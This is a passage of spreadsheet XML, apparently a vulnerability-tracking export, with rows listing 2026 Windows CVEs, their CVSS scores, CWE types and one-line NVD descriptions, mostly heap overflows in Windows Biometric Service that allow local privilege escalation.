          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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1" s="5" t="inlineStr"/>
      <c r="M201" s="5" t="inlineStr"/>
      <c r="N201" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O201" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P201" s="5" t="inlineStr"/>
      <c r="Q201" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R201" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S201" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78448</t>
        </is>
      </c>
    </row>
    <row r="202">
      <c r="A202" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B202" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C202" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83498</t>
        </is>
      </c>
      <c r="D202" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E202" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F202" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G202" s="5" t="inlineStr"/>
      <c r="H202" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I202" s="5" t="inlineStr"/>
      <c r="J202" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K202" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L202" s="5" t="inlineStr"/>
      <c r="M202" s="5" t="inlineStr"/>
      <c r="N202" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O202" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P202" s="5" t="inlineStr"/>
      <c r="Q202" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="R202" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Virtualization-Based Security (VBS) Enclave allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S202" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83498</t>
        </is>
      </c>
    </row>
    <row r="203">
      <c r="A203" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B203" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C203" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83942</t>
        </is>
      </c>
      <c r="D203" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E203" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F203" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G203" s="5" t="inlineStr"/>
      <c r="H203" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I203" s="5" t="inlineStr"/>
      <c r="J203" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K20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03" s="5" t="inlineStr"/>
      <c r="M203" s="5" t="inlineStr"/>
      <c r="N203" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O203" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P203" s="5" t="inlineStr"/>
      <c r="Q203" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R203" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Windows Kernel allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S203" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83942</t>
        </is>
      </c>
    </row>
    <row r="204">
      <c r="A204" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B204" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C204" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83952</t>
        </is>
      </c>
      <c r="D204" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E204" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F204" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G204" s="5" t="inlineStr"/>
      <c r="H204" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I204" s="5" t="inlineStr"/>
      <c r="J204" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K204" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L204" s="5" t="inlineStr"/>
      <c r="M204" s="5" t="inlineStr"/>
      <c r="N204" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O204" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P204" s="5" t="inlineStr"/>
      <c r="Q204" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R204" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Resilient File System (ReFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S204" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83952</t>
        </is>
      </c>
    </row>
    <row r="205">
      <c r="A205" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B205" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C205" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83954</t>
        </is>
      </c>
      <c r="D205" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E205" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F205" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G205" s="5" t="inlineStr"/>
      <c r="H205" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I205" s="5" t="inlineStr"/>
      <c r="J205" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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5" s="5" t="inlineStr"/>
      <c r="M205" s="5" t="inlineStr"/>
      <c r="N205" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O205" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P205" s="5" t="inlineStr"/>
      <c r="Q205" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R205" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S205" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83954</t>
        </is>
      </c>
    </row>
    <row r="206">
      <c r="A206" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B206" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C206" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83955</t>
        </is>
      </c>
      <c r="D206" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E206" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F206" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G206" s="5" t="inlineStr"/>
      <c r="H206" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I206" s="5" t="inlineStr"/>
      <c r="J206" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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6" s="5" t="inlineStr"/>
      <c r="M206" s="5" t="inlineStr"/>
      <c r="N206" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O206" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P206" s="5" t="inlineStr"/>
      <c r="Q206" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R206" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S206" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83955</t>
        </is>
      </c>
    </row>
    <row r="207">
      <c r="A207" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B207" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C207" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83967</t>
        </is>
      </c>
      <c r="D207" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E207" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F207" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G207" s="5" t="inlineStr"/>
      <c r="H207" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I207" s="5" t="inlineStr"/>
      <c r="J207" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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7" s="5" t="inlineStr"/>
      <c r="M207" s="5" t="inlineStr"/>
      <c r="N207" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O207" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P207" s="5" t="inlineStr"/>
      <c r="Q207" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R207" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S207" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83967</t>
        </is>
      </c>
    </row>
    <row r="208">
      <c r="A208" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B208" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C208" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83968</t>
        </is>
      </c>
      <c r="D208" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E208" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F208" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G208" s="5" t="inlineStr"/>
      <c r="H208" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I208" s="5" t="inlineStr"/>
      <c r="J208" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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8" s="5" t="inlineStr"/>
      <c r="M208" s="5" t="inlineStr"/>
      <c r="N208" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O208" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P208" s="5" t="inlineStr"/>
      <c r="Q208" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-416</t>
        </is>
      </c>
      <c r="R208" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S208" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83968</t>
        </is>
      </c>
    </row>
    <row r="209">
      <c r="A209" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B209" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C209" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83969</t>
        </is>
      </c>
      <c r="D209" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E209" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F209" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G209" s="5" t="inlineStr"/>
      <c r="H209" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I209" s="5" t="inlineStr"/>
      <c r="J209" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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09" s="5" t="inlineStr"/>
      <c r="M209" s="5" t="inlineStr"/>
      <c r="N209" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O209" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P209" s="5" t="inlineStr"/>
      <c r="Q209" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R209" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S209" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83969</t>
        </is>
      </c>
    </row>
    <row r="210">
      <c r="A210" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B210" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C210" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83970</t>
        </is>
      </c>
      <c r="D210" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E210" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F210" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G210" s="5" t="inlineStr"/>
      <c r="H210" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I210" s="5" t="inlineStr"/>
      <c r="J210" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K21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0" s="5" t="inlineStr"/>
      <c r="M210" s="5" t="inlineStr"/>
      <c r="N210" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O210" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P210" s="5" t="inlineStr"/>
      <c r="Q210" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R210" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S210" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83970</t>
        </is>
      </c>
    </row>
    <row r="211">
      <c r="A211" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B211" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C211" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83971</t>
        </is>
      </c>
      <c r="D211" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E211" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F211" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G211" s="5" t="inlineStr"/>
      <c r="H211" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I211" s="5" t="inlineStr"/>
      <c r="J211" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K21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1" s="5" t="inlineStr"/>
      <c r="M211" s="5" t="inlineStr"/>
      <c r="N211" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O211" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P211" s="5" t="inlineStr"/>
      <c r="Q211" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R211" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S211" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83971</t>
        </is>
      </c>
    </row>
    <row r="212">
      <c r="A212" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B212" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C212" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83972</t>
        </is>
      </c>
      <c r="D212" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E212" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F212" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G212" s="5" t="inlineStr"/>
      <c r="H212" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I212" s="5" t="inlineStr"/>
      <c r="J212" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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2" s="5" t="inlineStr"/>
      <c r="M212" s="5" t="inlineStr"/>
      <c r="N212" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O212" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P212" s="5" t="inlineStr"/>
      <c r="Q212" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R212" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S212" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83972</t>
        </is>
      </c>
    </row>
    <row r="213">
      <c r="A213" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B213" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C213" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83973</t>
        </is>
      </c>
      <c r="D213" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E213" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F213" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G213" s="5" t="inlineStr"/>
      <c r="H213" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I213" s="5" t="inlineStr"/>
      <c r="J213" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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3" s="5" t="inlineStr"/>
      <c r="M213" s="5" t="inlineStr"/>
      <c r="N213" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O213" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P213" s="5" t="inlineStr"/>
      <c r="Q213" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R213" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S213" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83973</t>
        </is>
      </c>
    </row>
    <row r="214">
      <c r="A214" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B214" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C214" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83974</t>
        </is>
      </c>
      <c r="D214" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E214" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F214" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G214" s="5" t="inlineStr"/>
      <c r="H214" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I214" s="5" t="inlineStr"/>
      <c r="J214" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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4" s="5" t="inlineStr"/>
      <c r="M214" s="5" t="inlineStr"/>
      <c r="N214" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O214" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P214" s="5" t="inlineStr"/>
      <c r="Q214" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R214" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S214" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83974</t>
        </is>
      </c>
    </row>
    <row r="215">
      <c r="A215" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B215" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C215" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83975</t>
        </is>
      </c>
      <c r="D215" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E215" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F215" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G215" s="5" t="inlineStr"/>
      <c r="H215" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I215" s="5" t="inlineStr"/>
      <c r="J215" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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5" s="5" t="inlineStr"/>
      <c r="M215" s="5" t="inlineStr"/>
      <c r="N215" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O215" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P215" s="5" t="inlineStr"/>
      <c r="Q215" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R215" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S215" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83975</t>
        </is>
      </c>
    </row>
    <row r="216">
      <c r="A216" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B216" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C216" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83976</t>
        </is>
      </c>
      <c r="D216" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E216" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F216" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G216" s="5" t="inlineStr"/>
      <c r="H216" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I216" s="5" t="inlineStr"/>
      <c r="J216" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K21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6" s="5" t="inlineStr"/>
      <c r="M216" s="5" t="inlineStr"/>
      <c r="N216" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O216" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P216" s="5" t="inlineStr"/>
      <c r="Q216" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R216" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S216" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83976</t>
        </is>
      </c>
    </row>
    <row r="217">
      <c r="A217" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B217" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C217" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83977</t>
        </is>
      </c>
      <c r="D217" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E217" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F217" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G217" s="5" t="inlineStr"/>
      <c r="H217" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I217" s="5" t="inlineStr"/>
      <c r="J217" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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7" s="5" t="inlineStr"/>
      <c r="M217" s="5" t="inlineStr"/>
      <c r="N217" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O217" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P217" s="5" t="inlineStr"/>
      <c r="Q217" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R217" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S217" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83977</t>
        </is>
      </c>
    </row>
    <row r="218">
      <c r="A218" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B218" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C218" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83978</t>
        </is>
      </c>
      <c r="D218" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E218" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F218" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G218" s="5" t="inlineStr"/>
      <c r="H218" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I218" s="5" t="inlineStr"/>
      <c r="J218" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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8" s="5" t="inlineStr"/>
      <c r="M218" s="5" t="inlineStr"/>
      <c r="N218" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O218" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P218" s="5" t="inlineStr"/>
      <c r="Q218" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R218" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S218" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83978</t>
        </is>
      </c>
    </row>
    <row r="219">
      <c r="A219" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B219" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C219" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83979</t>
        </is>
      </c>
      <c r="D219" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E219" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F219" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G219" s="5" t="inlineStr"/>
      <c r="H219" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I219" s="5" t="inlineStr"/>
      <c r="J219" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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19" s="5" t="inlineStr"/>
      <c r="M219" s="5" t="inlineStr"/>
      <c r="N219" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O219" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P219" s="5" t="inlineStr"/>
      <c r="Q219" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R219" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S219" s="6" t="inlineStr">
        <is>
